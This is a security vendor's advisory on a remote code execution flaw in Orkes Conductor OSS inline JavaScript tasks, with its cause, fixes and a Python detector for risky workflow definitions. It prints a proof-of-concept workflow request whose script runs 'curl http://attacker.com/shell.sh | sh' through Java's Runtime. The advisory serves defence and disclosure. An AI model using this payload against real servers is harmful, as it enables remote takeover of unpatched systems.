[2025.07 Vulnerability Report] Remote Code Execution in Orkes Conductor OSS (CVE-2025-26074) | SECaaS Platform AIONCLOUD


CVE-2025-26074 is a high-risk remote code execution (RCE) vulnerability that allows attackers to execute commands directly on the server without authentication, posing a serious security threat.

In particular, if the attack code is inserted into the internal system operation workflow, it could lead to long-term backdoors and system control takeover, requiring immediate action.

AIWAF products plan to develop patterns to address vulnerabilities occurring within Orkes and will respond swiftly to any vulnerabilities discovered in the future.

1. Overview

Orkes Conductor is an open source workflow orchestration engine developed by Netflix, designed to define and automatically execute complex workflows in microservice-based systems.

It offers flexible configuration options, including JSON-based workflow definitions, REST APIs, and JavaScript Tasks.

In enterprise environments, it is widely used for DevOps, CI/CD, and backend service automation.

This report summarizes the analysis of a Remote Code Execution vulnerability discovered in the recent Orkes Conductor OSS v3.21.11 release.

Source: https://www.orkes.io/

2. Attack Type

CVE-2025-26074 is a remote code execution (RCE) vulnerability discovered in Orkes Conductor OSS v3.21.11, which occurs in the execution logic of Inline JavaScript Tasks within user-defined workflows. The root cause of this vulnerability lies in the inadequate security settings of the Nashorn JavaScript engine used to process JavaScript within the Java-based server.

Conductor OSS supports the direct writing of JavaScript to automate workflows and handle specific tasks.

While this feature is intended to enhance usability and flexibility, the JavaScript code is executed directly through the Nashorn engine internally, and by default, access to Java's native classes is not blocked.

In particular, when the --no-java option is not applied, JavaScript can directly access Java standard libraries such as java.lang.Runtime, java.lang.ProcessBuilder, and java.io.*.

An attacker could exploit this vulnerability by inserting malicious JavaScript code during workflow definition.

For example, an attacker could register a workflow definition containing the following script. Example attack request:

POST /api/metadata/workflow HTTP/1.1
Host: vulnerable-conductor.example.com
Content-Type: application/json
Authorization: Bearer <your_api_token>

{
  "name": "exploit_inline_rce",
  "description": "PoC for CVE-2025-26074 - RCE via inline JavaScript",
  "version": 1,
  "tasks": [
    {
      "name": "inline_rce_task",
      "taskReferenceName": "rce_task",
      "type": "INLINE",
      "inputParameters": {
        "evaluatorType": "javascript",
        "expression": "var runtime = java.lang.Runtime.getRuntime(); runtime.exec('curl http://attacker.com/shell.sh | sh');"
      }
    }
  ],
  "schemaVersion": 2
}
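As an added example (not code from the report or from the Conductor project), the following Python walks a workflow definition of the shape shown above and flags INLINE tasks whose JavaScript expression references Java classes, the kind of check a request-inspection layer can apply to POST /api/metadata/workflow bodies. The indicator patterns and the two sample bodies are constructed here; the PoC command is replaced with a harmless Runtime lookup.

```python
import json
import re

# Indicators that an inline JavaScript expression reaches Java classes through
# Nashorn, which is only possible when the engine runs without --no-java.
JAVA_ACCESS_PATTERNS = [
    r"\bjava\.lang\.Runtime\b",
    r"\bjava\.lang\.ProcessBuilder\b",
    r"\bjava\.io\.",
    r"\bJava\.type\s*\(",
]

def _iter_tasks(node):
    """Yield every task object, including tasks nested in fork/decision branches."""
    if isinstance(node, dict):
        if "taskReferenceName" in node and "type" in node:
            yield node
        for value in node.values():
            yield from _iter_tasks(value)
    elif isinstance(node, list):
        for item in node:
            yield from _iter_tasks(item)

def find_risky_inline_tasks(workflow_json):
    """Return (taskReferenceName, pattern) for each INLINE javascript task whose
    expression references Java classes; an empty list means nothing matched."""
    findings = []
    for task in _iter_tasks(json.loads(workflow_json)):
        if task.get("type") != "INLINE":
            continue
        params = task.get("inputParameters") or {}
        if str(params.get("evaluatorType", "")).lower() != "javascript":
            continue
        expression = str(params.get("expression", ""))
        for pattern in JAVA_ACCESS_PATTERNS:
            if re.search(pattern, expression):
                findings.append((task.get("taskReferenceName"), pattern))
                break  # one finding per task is enough
    return findings

# Constructed sample bodies: one mirrors the shape of the PoC request above
# (harmless call instead of exec), the other is an ordinary inline task.
SAMPLE_MALICIOUS = json.dumps({"name": "exploit_inline_rce", "version": 1, "schemaVersion": 2, "tasks": [
    {"name": "inline_rce_task", "taskReferenceName": "rce_task", "type": "INLINE", "inputParameters":
     {"evaluatorType": "javascript", "expression": "var runtime = java.lang.Runtime.getRuntime();"}}]})
SAMPLE_BENIGN = json.dumps({"name": "double_workflow", "version": 1, "schemaVersion": 2, "tasks": [
    {"name": "double", "taskReferenceName": "double_ref", "type": "INLINE", "inputParameters":
     {"evaluatorType": "javascript", "value": "${workflow.input.n}", "expression": "$.value * 2"}}]})
```

String matching of this kind is defence in depth at the request layer only; the vendor's fix (upgrading to v3.21.13 or higher, or restricting Java access in the engine) remains the primary control.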

3. Response Measures

As the response to CVE-2025-26074, Orkes recommends upgrading to v3.21.13 or higher, disabling Inline Tasks, or restricting the Java access available to scripts.

We will conduct additional analysis on our AIWAF products and respond accordingly.

4. Conclusion

CVE-2025-26074 is a high-risk RCE vulnerability that allows direct execution of commands on the server, posing a serious security threat as it can be exploited without authentication.

In particular, if attack code is inserted into internal system operation workflows, it could lead to long-term backdoors and system control takeover, necessitating swift action.

Our AIWAF product plans to develop patterns to address vulnerabilities occurring within Orkes and will continue to respond swiftly to any newly discovered vulnerabilities in the future.

5. References

https://medium.com/@mrcnry/cve-2025-26074-remote-code-execution-in-conductor-oss-via-inline-javascript-injection-5ce3cb651cfb

https://github.com/conductor-oss/conductor

https://avd.aquasec.com/nvd/2025/cve-2025-26074/
